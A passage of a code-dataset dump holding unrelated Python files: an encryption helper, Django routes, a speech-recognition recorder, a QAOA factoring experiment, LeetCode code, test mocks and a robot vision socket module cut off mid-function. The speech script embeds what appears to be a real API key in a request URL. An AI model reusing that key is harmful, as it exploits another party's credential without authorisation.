+{"seq_id":"546010503","text":"# -- coding: utf-8 --\nimport os\nimport unittest\n#存放报告的位置\nreport_dir='./test_report'\n\nclass readLastestRp():\n def Latest_Report(report_dir):\n #os.listdir()方法用于返回指定文件夹包含文件或文件名字列表\n lists=os.listdir(report_dir)\n #按照时间顺序对该目录文件夹下面的文件进行排序\n lists.sort(key=lambda fn:os.path.getatime(report_dir+'\\\\'+fn))\n file=os.path.join(report_dir,lists[-1])\n print(\"\\033[1;33;0mreturn new file is%r\\033[0m\"%file)\n return file\n","sub_path":"testCase/model/readLastestRp.py","file_name":"readLastestRp.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540764165","text":"from playground.EIVHE.math_helper import *\n\n# This is the encryption class with optimizations\nfrom playground.EIVHE.operations import *\n\n\nclass Encryption:\n\n def __init__(self, encryption_core, w, scale, t_bound, input_range):\n self.encryption_core = encryption_core\n self.w = w\n self.scale = np.int64(scale)\n self.t_bound = t_bound\n self.input_range = input_range\n self.t_cache = self.load_t_cache()\n self.s_cache = self.load_s_cache()\n\n # Note that here, t is always with 1 row. hence I is always 1 for S' = [I, T].\n # Cipher is always one dimension higher than plain text\n def load_t_cache(self):\n t_cache = [generate_random_matrix(x, 1, self.t_bound) for x in range(self.w)]\n return t_cache\n\n # Secret is always of the size (plaintext + 1)\n def load_s_cache(self):\n s_cache = [self.encryption_core.key_switching_get_secret(t) for t in self.t_cache]\n return s_cache\n\n def get_t(self, size):\n if size >= self.input_range:\n raise ValueError(\"size {} exceeded input range {}\".format(size, self.input_range))\n else:\n return self.t_cache[size]\n\n def get_s(self, size):\n if size >= self.input_range:\n raise ValueError(\"size {} exceeded input range {}\".format(size, self.input_range))\n else:\n return self.s_cache[size]\n\n def encrypt_vector(self, vector):\n vector = np.multiply(np.array(vector), self.scale).round().astype(np.int64)\n s0 = self.encryption_core.naive_encrypt_secret(self.w, vector.size)\n c0 = vector\n t1 = self.get_t(vector.size)\n c1 = self.encryption_core.key_switching_get_cipher(c0, s0, t1)\n return c1\n\n def decrypt_vector(self, cipher):\n secret = self.get_s(len(cipher) - 1)\n result = self.encryption_core.decrypt(secret, cipher, self.w)\n return np.array(result / np.float64(self.scale))\n\n # Do not need to scale because it is calling encrypt vector\n def encrypt_number(self, number):\n x = np.array([number])\n cipher = self.encrypt_vector(x)\n return cipher\n\n def decrypt_number(self, cipher):\n result = self.encryption_core.decrypt(self.get_s(1), cipher, self.w)\n return result / np.float64(self.scale)\n\n # Encode each row of the matrix\n def encrypt_matrix(self, matrix):\n matrix = np.multiply(np.matrix(matrix), self.scale).round().astype(np.int64)\n column_size = matrix.shape[1]\n s0 = self.encryption_core.naive_encrypt_secret(self.w, column_size)\n t1 = self.get_t(column_size)\n encrypted_matrix = np.matrix([\n self.encryption_core.key_switching_get_cipher(np.array(x).reshape(-1), s0, t1)\n for x in matrix\n ])\n return encrypted_matrix\n\n def decrypt_matrix(self, cipher):\n result = self.encryption_core.decrypt(self.get_s(cipher.shape[1] - 1), cipher, self.w)\n return np.matrix(result / np.float64(self.scale))\n\n @staticmethod\n def add(cipher1, cipher2):\n assert (cipher1.shape == cipher2.shape)\n return np.add(np.array(cipher1), np.array(cipher2))\n\n @staticmethod\n def subtract(cipher1, cipher2):\n assert (cipher1.shape == cipher2.shape)\n return np.subtract(np.array(cipher1), np.array(cipher2))\n\n # Be very careful here, calling round will lose precision in multiply\n @staticmethod\n def multiply_scalar(cipher, number):\n return np.array(np.multiply(cipher, np.float64(number))).round().astype(np.int64)\n\n # Be very careful here, calling round will lose precision in divide\n @staticmethod\n def divide_scalar(cipher, number):\n return np.array(np.divide(cipher, np.float64(number))).round().astype(np.int64)\n\n def weighted_inner_product(self, cipher1, h, cipher2):\n # On Client, note that result always has dimension 1.\n secret1 = self.get_s(len(cipher1) - 1)\n secret2 = self.get_s(len(cipher2) - 1)\n m = secure_inner_product_client(self.encryption_core, secret1, secret2, h, self.get_t(1))\n # On Server\n cipher = secure_inner_product_server(self.encryption_core, cipher1, cipher2, m, self.w)\n return self.divide_scalar(cipher, self.scale)\n\n def linear_transform(self, g, cipher):\n # On Client\n gt = self.get_t(g.shape[0])\n gs = self.encryption_core.key_switching_get_secret(gt)\n input_secret = self.get_s(len(cipher) - 1)\n m = secure_linear_transform_client(self.encryption_core, g, input_secret, gt)\n # On Server\n gt_cipher = secure_linear_transform_server(self.encryption_core, cipher, m)\n # Perform key switching again to switch back to keys in get_t\n t = self.get_t(g.shape[0])\n cipher = self.encryption_core.key_switching_get_cipher(gt_cipher, gs, t)\n return cipher\n\n @staticmethod\n def one_hot_transform(number_cipher, total_elements, element_index):\n result = np.append(np.zeros(element_index), number_cipher)\n result = np.append(result, np.zeros(total_elements - element_index - 1))\n return result\n\n def transpose(self, encrypted_matrix):\n encrypted_matrix = np.array(encrypted_matrix)\n n_rows = encrypted_matrix.shape[0]\n n_cols = encrypted_matrix.shape[1] - 1\n eye_n_cols = np.eye(n_cols)\n encrypted_eye_n_cols = np.array(self.encrypt_matrix(eye_n_cols))\n transpose = []\n for col in range(n_cols):\n new_row_after_transpose = np.zeros(n_rows + 1)\n encrypted_one_hot_n_col = encrypted_eye_n_cols[col]\n for row in range(n_rows):\n cipher_scalar = self.weighted_inner_product(encrypted_matrix[row], eye_n_cols, encrypted_one_hot_n_col)\n new_row_after_transpose += self.one_hot_transform(cipher_scalar, n_rows, row)\n transpose.append(new_row_after_transpose)\n return np.array(transpose)\n\n # 1. + x + x*x/2. + x*x*x/6.\n # Note: losing precision here\n def exponential(self, x):\n one = self.encrypt_number(1)\n x_power_2 = self.weighted_inner_product(x, np.eye(1), x)\n x_power_3 = self.weighted_inner_product(x_power_2, np.eye(1), x)\n result = one\n result = self.add(result, x)\n result = self.add(result, self.divide_scalar(x_power_2, 2))\n result = self.add(result, self.divide_scalar(x_power_3, 6))\n return result\n\n def cipher_list_to_cipher_vector(self, cipher_list):\n number_of_elements = len(cipher_list)\n eye = np.array(np.eye(number_of_elements))\n result = np.zeros(number_of_elements + 1)\n for i in range(number_of_elements):\n result += self.one_hot_transform(cipher_list[i], number_of_elements, i)\n return result\n\n def exponential_vector(self, vector):\n number_of_elements = vector.size - 1\n eye = np.array(np.eye(number_of_elements))\n cipher_list = []\n eye_encrypted = np.array(self.encrypt_matrix(eye))\n for i in range(number_of_elements):\n cipher_scalar = self.weighted_inner_product(vector, eye, eye_encrypted[i])\n cipher_exponential = self.exponential(cipher_scalar)\n cipher_list.append(cipher_exponential)\n return self.cipher_list_to_cipher_vector(cipher_list)\n\n # Note: losing precision here\n def softmax(self, vector):\n number_of_elements = vector.size - 1\n eye = np.array(np.eye(number_of_elements))\n result = np.zeros(number_of_elements + 1)\n exponential_sum = np.zeros(2)\n eye_encrypted = np.array(self.encrypt_matrix(eye))\n for i in range(number_of_elements):\n cipher_scalar = self.weighted_inner_product(vector, eye, eye_encrypted[i])\n cipher_exponential = self.exponential(cipher_scalar)\n result += self.one_hot_transform(cipher_exponential, number_of_elements, i)\n exponential_sum += cipher_exponential\n\n one = self.encrypt_number(1)\n scale = np.sum(exponential_sum) / np.sum(one)\n return self.divide_scalar(result, scale)\n\n def outer_product(self, cipher1, cipher2):\n cipher1 = np.array(cipher1)\n cipher2 = np.array(cipher2)\n eye = np.eye(cipher1.shape[1] - 1)\n cipher2_transpose = np.array(self.transpose(cipher2))\n element_result = [[self.weighted_inner_product(cipher1_row, eye, cipher2_row)\n for cipher2_row in cipher2_transpose] for cipher1_row in cipher1]\n result = [self.cipher_list_to_cipher_vector(element_row) for element_row in element_result]\n return np.array(result)\n\n def sum(self, vector_cipher):\n number_of_elements = len(vector_cipher) - 1\n ones = self.encrypt_vector(np.ones(number_of_elements))\n return self.weighted_inner_product(vector_cipher, np.eye(number_of_elements), ones)\n","sub_path":"playground/EIVHE/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"356400062","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.product_list, name='product_list'),\n url(r'^beads_necklace/$', views.beads_necklace_view, name='beads_necklace_view'),\n url(r'^other_products/$', views.other_products_view, name='other_products_view'),\n url(r'^(?P[\\w-]+)/$', views.product_view, name='product_view'),\n]\n\n","sub_path":"src/apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"547163921","text":"#!/usr/bin/env python\n# --utf-8--\n\nimport requests\nimport json\nimport pyaudio\nimport sys\nimport time\nimport wave\nimport subprocess\n\nimport jtalk\n\n#解析する音声の録音\ndef rec():\n #各種設定\n chunk = 512\n #APIの規定で16bitに設定\n FORMAT = pyaudio.paInt16\n #モノラル\n CHANNELS = 1\n #サンプリングレート,APIの規定で16kHzに設定\n RATE = 16000\n #録音時間\n RECORD_SECONDS = 3\n\n #pyaudio\n audio = pyaudio.PyAudio()\n #マイク0番を設定\n Mic_index = 0\n #マイクからデータ取得\n stream = audio.open(format = FORMAT,\n channels = CHANNELS,\n rate = RATE,\n input = True,\n input_device_index = Mic_index,\n frames_per_buffer = chunk)\n\n #--録音--\n print ('Recording now...')\n all = []\n for i in range(0, int(RATE / chunk * RECORD_SECONDS)):\n data = stream.read(chunk)\n all.append(data)\n print ('Finised Recording')\n #--録音--\n\n stream.stop_stream()\n stream.close()\n audio.terminate()\n\n out = wave.open('/home/taichi/RosVI/audio/command.wav','wb')\n out.setnchannels(CHANNELS) #mono\n out.setsampwidth(audio.get_sample_size(FORMAT)) #16bits\n out.setframerate(RATE)\n out.writeframes(b''.join(all))\n out.close()\n\n#docomo音声認識APIによる解析\ndef recognize():\n #命令の取得(録音)\n rec()\n #ファイルの場所\n path = '/home/taichi/RosVI/audio/command.wav'\n #docomo音声認識API\n url = \"https://api.apigw.smt.docomo.ne.jp/amiVoice/v1/recognize?APIKEY=593030457255434f45696f61737833635a59665132624a4c363939306279525351565535635864704e622e\"\n wav_file = {\"a\": open(path, 'rb'), \"v\":\"off\"}\n #postしてけっかを取得\n result = requests.post(url, files=wav_file)\n responce = (result.json()['text'])\n\n jtalk.order(responce)\n\nif __name__ == '__main__' :\n print ('これは音声認識モジュールです.importしてください.')\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"85790596","text":"\ndef CalcLength(a, b):\n\tlength = 2\n\twhile a - b >= 0:\n\t\ttemp = a - b\n\t\ta = b\n\t\tb = temp\n\t\tlength += 1\n\treturn length\n\nn = int(input())\nmaxLength = 0\nfor i in range(1, n + 1):\n\tlength = CalcLength(n, i)\n\tif length >= maxLength:\n\t\tmaxLength = length\nprint(maxLength)\n","sub_path":"Mchain.py","file_name":"Mchain.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"502834092","text":"from vqf.preprocessing import create_clauses, calculate_number_of_unknowns\nfrom vqf.preprocessing import factor_56153, factor_291311\nfrom vqf.optimization import OptimizationEngine\nfrom sympy import Add, Mul, Symbol\nimport numpy as np\nimport pdb\n\n\ndef run_single_case(p_q_info, optimization_engine):\n sampling_results, mapping, bfgs_evaluations = optimization_engine.perform_qaoa()\n most_frequent_bit_string = max(sampling_results, key=lambda x: sampling_results[x])\n \n squared_overlap = calculate_squared_overlap(mapping, sampling_results, p_q_info)\n\n return squared_overlap, bfgs_evaluations, optimization_engine.step_by_step_results\n\n\ndef calculate_squared_overlap(mapping, sampling_results, p_q_info, verbose=False):\n true_p = p_q_info[0]\n true_q = p_q_info[1]\n p_dict = p_q_info[2]\n q_dict = p_q_info[3]\n\n p_binary_string = bin(true_p)[2:][::-1]\n q_binary_string = bin(true_q)[2:][::-1]\n\n p_binary = [int(char) for char in p_binary_string]\n q_binary = [int(char) for char in q_binary_string]\n if len(p_binary) < len(p_dict):\n trailing_zeros = len(p_dict) - len(p_binary)\n for zero in range(trailing_zeros):\n p_binary.append(0)\n\n if len(q_binary) < len(q_dict):\n trailing_zeros = len(q_dict) - len(q_binary)\n for zero in range(trailing_zeros):\n q_binary.append(0)\n\n all_correct_assignments = []\n correct_assignment = {}\n for q_id, q_val in q_dict.items():\n if type(q_val) is Symbol:\n bit_id = mapping[str(q_val)]\n correct_value = q_binary[q_id]\n if bit_id not in correct_assignment.keys():\n correct_assignment[bit_id] = correct_value\n\n for p_id, p_val in p_dict.items():\n if type(p_val) is Symbol:\n bit_id = mapping[str(p_val)]\n correct_value = p_binary[p_id]\n if bit_id not in correct_assignment.keys():\n correct_assignment[bit_id] = correct_value\n\n all_correct_assignments.append(correct_assignment)\n # TODO: \n # This is just a hack for 56153 and 291311 to work properly.\n # It should be generalized to work for any symmetric case.\n\n if (true_p == 241 and true_q == 233):\n assignment_1 = {mapping['p_3']: 0, mapping['p_4']: 1, mapping['q_3']: 1, mapping['q_4']: 0}\n assignment_2 = {mapping['p_3']: 1, mapping['p_4']: 0, mapping['q_3']: 0, mapping['q_4']: 1}\n all_correct_assignments = [assignment_1, assignment_2]\n\n if (true_p == 557 and true_q == 523):\n assignment_1 = {mapping['p_1']: 0, mapping['p_2']: 1, mapping['p_5']: 1, mapping['q_1']: 1, mapping['q_2']: 0, mapping['q_5']: 0}\n assignment_2 = {mapping['p_1']: 1, mapping['p_2']: 0, mapping['p_5']: 0, mapping['q_1']: 0, mapping['q_2']: 1, mapping['q_5']: 1}\n all_correct_assignments = [assignment_1, assignment_2]\n\n\n total_overlap = 0\n total_count = 0\n if verbose:\n print(all_correct_assignments)\n print(mapping)\n squared_overlap = 0\n for correct_assignment in all_correct_assignments:\n for bit_string, count in sampling_results.most_common():\n correct_count = 0\n for bit_id, bit_value in enumerate(bit_string):\n # This accounts for the fact some of the bits of the sampling results\n # are irrelevant to the result - namely, carry bits.\n if bit_id not in correct_assignment.keys():\n continue\n if bit_value == correct_assignment[bit_id]:\n correct_count += 1\n overlap = (correct_count / len(correct_assignment))**2 * count\n total_count += count\n if verbose:\n print(bit_string, count, correct_count, overlap)\n total_overlap += overlap\n if verbose:\n print(\"_\"*10)\n total_overlap = total_overlap / total_count\n squared_overlap += total_overlap\n return squared_overlap\n\n\ndef main():\n results = []\n # p_q_m_list = [[283, 7, 1981], [29, 11, 319], [263, 263, 69169], [263, 11, 2893], [241, 233, 56153], [557, 523, 291311]]\n # grid_sizes = [6, 24, 36, 9, 12, 24]\n # unknowns_list = [[2, 0], [6, 3], [8, 5], [3, 1], [4, 0], [6, 0]]\n p_q_m_list = [[283, 7, 1981], [263, 11, 2893], [241, 233, 56153], [557, 523, 291311], [29, 11, 319], [263, 263, 69169]]\n grid_sizes = [6, 9, 12, 24, 24, 36]\n unknowns_list = [[2, 0], [3, 1], [4, 0], [6, 0], [6, 3], [8, 5]]\n for p_q_m, grid_size, unknowns in zip(p_q_m_list, grid_sizes, unknowns_list):\n true_p = p_q_m[0]\n true_q = p_q_m[1]\n m = p_q_m[2]\n apply_preprocessing = True\n preprocessing_verbose = False\n optimization_verbose = False\n if m != 319 and m != 69169:\n continue\n number_of_unknowns = 0\n carry_bits = 0\n counter = 0\n if m == 56153:\n p_dict, q_dict, z_dict, clauses = factor_56153()\n elif m == 291311:\n p_dict, q_dict, z_dict, clauses = factor_291311()\n else:\n p_dict, q_dict, z_dict, clauses = create_clauses(m, true_p, true_q, apply_preprocessing, preprocessing_verbose)\n number_of_unknowns, carry_bits = calculate_number_of_unknowns(p_dict, q_dict, z_dict)\n\n if number_of_unknowns != unknowns[0] or carry_bits != unknowns[1]:\n print(\"Got wrong number of unknowns!\")\n continue\n\n p_q_info = [true_p, true_q, p_dict, q_dict]\n step_by_step_results = None\n for steps in range(1, 9):\n for i in range(1):\n print(m, steps, i) \n # optimization_engine = OptimizationEngine(clauses, steps=steps, grid_size=grid_size, tol=1e-10, gate_noise=1e-3, verbose=optimization_verbose, visualize=False)\n optimization_engine = OptimizationEngine(clauses, steps=steps, grid_size=grid_size, tol=1e-10, gate_noise=None, verbose=optimization_verbose, visualize=False)\n optimization_engine.step_by_step_results = step_by_step_results\n squared_overlap, bfgs_evaluations, step_by_step_results = run_single_case(p_q_info, optimization_engine)\n \n print(squared_overlap)\n results.append([m, steps, squared_overlap, bfgs_evaluations])\n\n # optimization_history = optimization_engine.optimization_history\n # history_file_name = \"_\".join([str(m), str(steps), str(i), \"history\"]) + \".csv\"\n # np.savetxt(history_file_name, optimization_history, delimiter=\",\")\n np.savetxt(\"results.csv\", results, delimiter=\",\", header=\"m,steps,squared_overlap,bfgs_evaluations\", fmt='%.4f', comments='')\n\nif __name__ == '__main__':\n main()","sub_path":"research/2019_05_08_performance_checks/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"213469490","text":"\"\"\"\nThe algorithm should run in linear time and in O(1) space.\n\"\"\"\n\n\nclass Solution:\n\n def majorityElement(self, nums: list[int]) -> list[int]:\n \"\"\"\n Boyer-Moore Majority Vote Algorithm:\n 由于最多有两个可能的元素,所以我们使用两个 candidate,每个 candidate 对应一个 counter。\n 先判断当前元素是否与 candidate 相匹配,若不匹配,则判断是否要更新 candidate,若也不需要更新,\n 则已经获取了三个不同的元素,即当前元素和两个 candidate,去除的方式是两个 counter 同时减一。\n 不能类似 Majority Element 那样,使用数组的前两个元素作为两个 candidate,因为数组的前两个元素可能是相同的。\n 其实解决办法也很简单,只要给两个 candidate 赋予不同的初值,并且两个 counter 的初值均为 0 即可。\n 如果先判断 counter,则有可能出现两个 candidate 相同的情况\n :param nums:\n :return:\n \"\"\"\n def validate(nums: list[int], candidate):\n \"\"\"\n 判断candidate元素的个数是否大于len(nums)的1/3\n :param nums:\n :param candidate:\n :return:\n \"\"\"\n count = 0\n for ele in nums:\n if ele == candidate:\n count += 1\n if count > len(nums) // 3:\n return True\n else:\n return False\n res = []\n candidate_1, candidate_2 = 0, 1\n count_1, count_2 = 0, 0\n for element in nums:\n if element == candidate_1:\n count_1 += 1\n elif element == candidate_2:\n count_2 += 1\n elif count_1 == 0:\n candidate_1 = element\n count_1 = 1\n elif count_2 == 0:\n candidate_2 = element\n count_2 = 1\n else:\n count_1 -= 1\n count_2 -= 1\n if validate(nums, candidate_1):\n res.append(candidate_1)\n if validate(nums, candidate_2):\n res.append(candidate_2)\n return res","sub_path":"Medium/MajorityElementII.py","file_name":"MajorityElementII.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12219702","text":"\"\"\"\nBase classes for use by mocks\n\"\"\"\n\nimport datetime\nfrom enum import Enum\nimport math\nfrom pathlib import Path\nimport re\nfrom typing import List, Union\n\nfrom musicbingo.docgen.colour import Colour\nfrom musicbingo.docgen.sizes import Dimension\nfrom musicbingo.docgen.styles import Padding\nfrom musicbingo.song import Duration\n\nclass MockBase:\n \"\"\"\n Base class used by other mocks\n \"\"\"\n\n #pylint: disable=too-many-branches\n def flatten(self, items, convert_numbers=False):\n \"\"\"Converts an object in to a form suitable for JSON encoding.\n flatten will take a dictionary, list or tuple and inspect each item\n in the object looking for items such as datetime.datetime objects\n that need to be converted to a canonical form before\n they can be processed for storage.\n \"\"\"\n if isinstance(items, dict):\n retval = {}\n else:\n retval = []\n for item in items:\n key = None\n if isinstance(items, dict):\n key = item\n item = items[key]\n if hasattr(item, 'as_dict'):\n item = self.flatten(item.as_dict())\n if isinstance(item, (datetime.datetime, datetime.time)):\n item = self.to_iso_datetime(item)\n elif isinstance(item, (datetime.timedelta)):\n item = self.to_iso_duration(item)\n elif isinstance(item, Colour):\n item = item.css()\n elif isinstance(item, Dimension):\n item = str(item)\n elif isinstance(item, Duration):\n item = int(item)\n elif isinstance(item, Padding):\n item = self.flatten(tuple(item))\n elif isinstance(item, Path):\n item = '/'.join([item.parent.name, item.name])\n elif isinstance(item, Enum):\n item = item.name\n elif convert_numbers and isinstance(item, int):\n item = str(item).replace('l', '')\n elif isinstance(item, str):\n item = item.replace(\"'\", \"\\'\")\n elif isinstance(item, (list, set, tuple)):\n item = self.flatten(list(item))\n elif isinstance(item, dict):\n item = self.flatten(item)\n if callable(item):\n continue\n if key:\n retval[key] = item\n else:\n retval.append(item)\n if items.__class__ == tuple:\n return tuple(retval)\n return retval\n\n @staticmethod\n def to_iso_datetime(value: Union[datetime.datetime, datetime.time]) -> str:\n \"\"\"\n Convert a datetime to an ISO8601 formatted dateTime string.\n :param value: the dateTime to convert\n :returns: an ISO8601 formatted string version of the dateTime\n \"\"\"\n retval = value.isoformat()\n if value.tzinfo is None:\n retval += 'Z'\n else:\n # replace +00:00 timezone with Z\n retval = re.sub('[+-]00:00$', 'Z', retval)\n return retval\n\n @staticmethod\n def to_iso_duration(secs: Union[datetime.timedelta, str, float]) -> str:\n \"\"\"\n Convert a time period to an ISO8601 formatted duration string.\n :param secs: the duration to convert, in seconds\n :returns: an ISO8601 formatted string version of the duration\n \"\"\"\n if isinstance(secs, str):\n secs = float(secs)\n elif isinstance(secs, datetime.timedelta):\n secs = secs.total_seconds()\n hrs = int(math.floor(secs / 3600.0))\n retval: List[str] = ['PT']\n secs %= 3600\n mins = int(math.floor(secs / 60.0))\n secs %= 60\n if hrs:\n retval.append(f'{hrs}H')\n if hrs or mins:\n retval.append(f'{mins}M')\n retval.append('{0:0.2f}S'.format(secs))\n return ''.join(retval)\n","sub_path":"musicbingo/tests/mock_base.py","file_name":"mock_base.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"565455245","text":"#-----------------------------------------------------------------------------\n# Name: IO.py\n# Author: Michael Aughton\n# Created: 6/22/15\n#-----------------------------------------------------------------------------\n\n'''IO Module that is in charge of data request and data response'''\n\nimport socket\nimport logging\nimport struct\nimport sys\nimport copy\nfrom lib.tools import indent\nfrom client.nlu import semanticprocessor\nfrom math import sqrt\n\n\nlogger = logging.getLogger(__name__)\n\nvision_sock = None\nrec_sock = None\nbuffer_size = 8192 # the bytes of received data should not exceed this size\nenabled = True\nenvironment = \"\"\nblocks = []\nvision_enabled = False\nrec_enabled = False\nvision_ip = None\nvision_port = None\n\n\n# color codes\n_colors = {0:\"unknown\",\n 1:\"black\",\n 2:\"blue\",\n 3:\"brown\",\n 4:\"grey\",\n 5:\"green\",\n 6:\"orange\",\n 7:\"pink\",\n 8:\"purple\",\n 9:\"red\",\n 10:\"white\",\n 11:\"yellow\"}\n\n# arrays of block indices corresponding to their respective block colors\ncolors_b = {\"unknown\":[],\n \"black\":[],\n \"blue\":[],\n \"brown\":[],\n \"grey\":[],\n \"green\":[],\n \"orange\":[],\n \"pink\":[],\n \"purple\":[],\n \"red\":[],\n \"white\":[],\n \"yellow\":[]}\n\n# arrays of box indices corresponding to their respective box colors\ncolors_box = {\"unknown\":[],\n \"black\":[],\n \"blue\":[],\n \"brown\":[],\n \"grey\":[],\n \"green\":[],\n \"orange\":[],\n \"pink\":[],\n \"purple\":[],\n \"red\":[],\n \"white\":[],\n \"yellow\":[]}\n\n# approximate rgb values for each color\n_rgb = {\"unknown\":(-1,-1,-1),\n \"black\":(1,0,0),\n \"blue\":(0,0,255),\n \"brown\":(166,42,42),\n \"grey\":(125,125,125),\n \"green\":(0,255,0),\n \"orange\":(255,127,0),\n \"pink\":(188,143,143),\n \"purple\":(128,0,128),\n \"red\":(255,0,0),\n \"white\":(255,255,255),\n \"yellow\":(255,255,0)}\n\nobject_sizes = {\"block1\":[30,30,30],\n \"block2\":[30,60,30],\n \"block3\":[30,60,15],\n \"block4\":[30,90,15],\n \"block5\":[40,82,17],\n \"box\":[135,120,135],\n \"bottle\":[60,200,60],\n \"tallcyl\":[85,160,85],\n \"shortcyl\":[85,80,85]}\n\ndef get_vision_address(ip, port):\n \"\"\"Initializes socket address\"\"\"\n global vision_enabled\n global vision_ip\n global vision_port\n \n if vision_enabled:\n vision_ip = ip\n vision_port = port\n else:\n pass\n\ndef init_connect(module, ip, port):\n \"\"\"Initializes socket connections.\"\"\"\n\n global vision_sock\n global rec_sock\n \n if module == \"vision\":\n try:\n vision_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n vision_sock.connect((ip, port))\n except socket.error:\n logger.error(\"Connection to vision capture server refused\")\n return ''\n elif module == \"rec\":\n try:\n rec_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n rec_sock.connect((ip, port))\n except socket.error:\n logger.error(\"Connection to recipient refused\")\n return '' \n \n\ndef sendEnvRequest(action = None):\n \"\"\"Builds and returns a string of the environment through the network,\n if networking is enabled, or through a test array, if networking is\n disabled.\n \"\"\"\n \n global vision_enabled\n \n if vision_enabled:\n env_str = sendEnvRequest_network(action)\n else:\n env_str = None\n \n return env_str\n\n\ndef sendEnvRequest_network(action = None):\n \"\"\"Requests and assembles the environment string through information\n received from the server.\n \"\"\"\n \n global vision_sock\n global environment\n \n global vision_ip\n global vision_port\n \n global blocks\n \n init_connect(\"vision\", vision_ip, vision_port)\n \n vision_sock.send(bytes('0001'+'\\0', 'UTF-8'))\n \n data = vision_sock.recv(buffer_size) \n obj_array = []\n if data is not None:\n try:\n for i in range(20):\n obj = []\n for j in range(10):\n loc = i*10 + j\n obj.extend(struct.unpack('f',data[4*loc:4*(loc + 1)]))\n obj_array.append(obj)\n except:\n logger.error(\"Error in unpacking data\")\n else:\n logger.error(\"No data received in response to request\")\n \n vision_sock.close()\n\n for color in colors_b.keys():\n colors_b[color] = [] \n \n for color in colors_box.keys():\n colors_box[color] = []\n \n blocks = []\n for obj in obj_array:\n if int(obj[0]) == 0: break \n blocks.append(sceneObject(obj, action))\n \n env_str = \"\" \n for block in blocks:\n env_str += block.return_string() + '+'\n\n # assume gripper is closed \n gripperCloseSignal = 0\n\n environment = env_str[:-1]\n \n return str(gripperCloseSignal) + '#' + env_str[:-1]\n\n\ndef sendActions(actions, env = '', vision_ip = None, vision_port = None,\n rec_ip = None, rec_port = None):\n \"\"\"Sends the action sequence to the server through the connection and closes\n the socket connections.\n \"\"\"\n \n global rec_sock\n global rec_enabled\n global vision_sock\n global vision_enabled\n global timesAccessed2\n \n \n if vision_enabled:\n if vision_ip is None or vision_port is None:\n logger.info(\"Vision IP or port not specified, actions not sent\")\n return\n try:\n init_connect(\"vision\", vision_ip, vision_port)\n except socket.error:\n logger.error(\"Connection to vision capture refused, actions not sent\")\n return\n \n if rec_enabled:\n if rec_ip is None or rec_port is None:\n logger.info(\"Recipient IP or port not specified, actions not sent\")\n return\n try:\n init_connect(\"rec\", rec_ip, rec_port)\n except socket.error:\n logger.error(\"Connection to recipient refused, actions not sent\")\n return\n\n visioninfo = ''\n if type(actions) != tuple:\n for action in actions.values():\n visioninfo += str(action)\n visioninfo += '+' + environment\n\n recinfo = visioninfo\n \n if recinfo != '':\n logger.info('generated action string: '+visioninfo)\n logger.info('sending command string: '+recinfo)\n if vision_enabled:\n vision_sock.send(bytes(visioninfo+'\\0', 'UTF-8'))\n if rec_enabled:\n rec_sock.send(bytes(recinfo+'\\0', 'UTF-8'))\n else:\n logger.info('No actions to send')\n \n if vision_enabled:\n vision_sock.close()\n if rec_enabled:\n rec_sock.close()\n \ndef find_object(objs, width, height, depth):\n \"\"\"Given an object array, returns the scene object which most closely fits \n the desired parameters.\n \n @param objs - array of scene objects to be searched\n @param width - width of desired object\n @param height - height of desired object\n @param depth - depth of desired object\n \"\"\"\n \n lowest_error = sys.maxsize\n lowest_error_obj = None\n for obj in objs:\n error = sqrt((width - obj.width)**2 + (height - obj.height)**2 + \\\n (depth - obj.depth)**2)\n if error < lowest_error:\n lowest_error = error\n lowest_error_obj = obj\n return lowest_error_obj\n \n\ndef match_object(obj):\n lowest_error = sys.maxsize\n lowest_error_obj = None\n width_a, height_a, depth_a = obj.width, obj.height, obj.depth\n for item in object_sizes.keys():\n width_b, height_b, depth_b = object_sizes[item]\n error = sqrt((width_a - width_b)**2 + (height_a - height_b)**2 + \\\n (depth_a - depth_b)**2)\n if error < lowest_error:\n lowest_error = error\n lowest_error_obj = item\n return lowest_error_obj\n\ndef trajectory(obj1, obj2=None):\n \"\"\"Given two sceneObjects, returns the trajectory between them OR\n given a solution list, returns the total trajectory of the solution.\n If there is a typing error, returns 0 and a logging error is raised.\n \n @param obj1 - a sceneObject or a solution list\n @param obj2 - a sceneObject, only necessary if obj1 is not a list\n \"\"\"\n global blocks\n \n blocks_t = copy.deepcopy(blocks)\n\n blocks_t.append(sceneObject([43.0,0.0,1000.0,0.0,70.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t.append(sceneObject([28.0,0.0,1000.0,0.0,70.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t.append(sceneObject([75.0,0.0,700.0,0.0,100.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t[-3].name = \"tip\"\n blocks_t[-2].name = \"air\"\n blocks_t[-1].name = \"table\"\n \n if isinstance(obj1,sceneObject) and isinstance(obj2,sceneObject):\n return abs(obj1.x-obj2.x)+abs(obj1.y-obj2.y)+abs(obj1.z-obj2.z)\n elif isinstance(obj1,list):\n total = 0\n for action in obj1:\n act = action.name[1:-1].split(' ')\n if act[0] in ['open_gripper','close_gripper']:\n pass\n elif len(act) == 4:\n for block in blocks_t:\n if act[1] == block.name:\n s_obj1 = block\n if act[3] == 